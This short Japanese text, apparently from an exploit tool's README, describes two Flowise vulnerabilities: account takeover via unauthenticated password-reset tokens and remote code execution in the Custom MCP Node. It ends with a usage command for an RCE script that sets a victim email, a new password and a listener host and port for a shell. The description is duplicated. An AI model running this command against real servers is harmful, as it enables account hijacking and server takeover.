
CVE-2025-58434 Flowise <= 3.0.5およびそれ以前のバージョンでは、認証されていないパスワード再設定トークンを介してアカウント乗っ取りが可能です。CVE-2025-59528 lowiseAI Custom MCP Nodeにおけるリモートコード実行。
CVE-2025-58434 Flowise <= 3.0.5 およびそれ以前のバージョンでは、認証されていないパスワード再発行トークンを介したアカウント乗っ取りが可能です。CVE-2025-59528 flowiseAI Custom MCP Node のリモートコード実行。
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>